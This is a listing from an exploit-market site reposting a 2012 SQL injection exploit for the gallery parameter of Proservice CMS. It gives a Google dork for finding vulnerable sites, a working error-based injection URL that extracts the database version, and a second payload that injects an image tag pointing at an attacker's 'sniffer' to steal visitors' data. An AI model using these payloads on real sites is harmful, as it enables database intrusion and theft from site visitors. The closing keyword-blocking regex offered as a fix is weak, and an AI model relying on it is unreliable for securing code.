[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Proservice CMS Gallery Code SQL Injection Vulnerability

Author
cheki
Risk
[
Security Risk High
]
0day-ID
0day-ID-18878
Category
web applications
Date add
30-06-2012
Platform
php
+-----------------------------------------------------------------
|  # Exploit Title: Proservice CMS Gallery Code SQL Injection Vulnerability
|  # Date: 30-06-2012
|  # Author: cheki
|  # Vendor Link: http://proservice.ge/
|  # Category:WebApp
|  # Price: NULL
|  # Contact: anrivardanidze@gmail.com
|  # Website: www.1337day.com && hacking.ge
|  # Greetings to: Anuka Bolqvadze and to rest of the 1337day members
|  # Google Dork: Created By: Pro-Service gcid=?
+-------------------------------------------------------------------

------------------[~Product Detail~]--------------------
Studio "PRO-Service" is a company which has serious technical-intelectual base to
make a suitable production for you and provide the development of internet resources
in Georgia.

Your site is a visit card of your business, first impression produce by a visual evaluation. Americain scientist due to their research have argued that 80% of customers
firststival appreciate
Web-site's appeareance and after his contents.

Because of this the design's creation is one of the most principal and difficult activities
while a creation of site and because good assumed

Web-design have been often made ,,<B>secret of succes</B>'' of firm, against other
covpetitor our company vill help you to plan your project in Internet and to
produce exact marketing strategie.

We make complicated,qualitative and individual web-sites which make an impression
on customers. Every staff of our study works for your interest. ,,Pro-Service''company
was staffed by a people with excellent professional skills. 
--------------------------------------------------------

-----------------[~TARGET INFO~]------------------------------
~Apache httpd 2.2.15 
~MYSQL: 5.0.51
~((Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2
~PHP/5.2.8
-------------------------------------------------------------

----------------[~SQL INJECTION EXPLOIT~]--------------------

http://TARGET/index.php?m=342&gcid=83'+and+(select+1+from+(select+count(0),concat((select version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+

----------------[~create snifer~]--------------------------

+and+(select+1+from+(select+count(0),concat((select hex('<img src="your snifer hare')),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+

-----------------------------------------------------------

----------------[~fix bug~]--------------------------------
for proservice.ge ^_^

PHP FILTER

preg_match('/(and|or|union|where|limit|group by|select|from|count|hex|rand|floor|\')/i', $gcid) 

----------------------------------------------------------

---------------[~Greetings to~]--------------------------
                
               Anuka Bolqvadze
----------------------------------------------------------



#  0day.today [2024-12-24]  #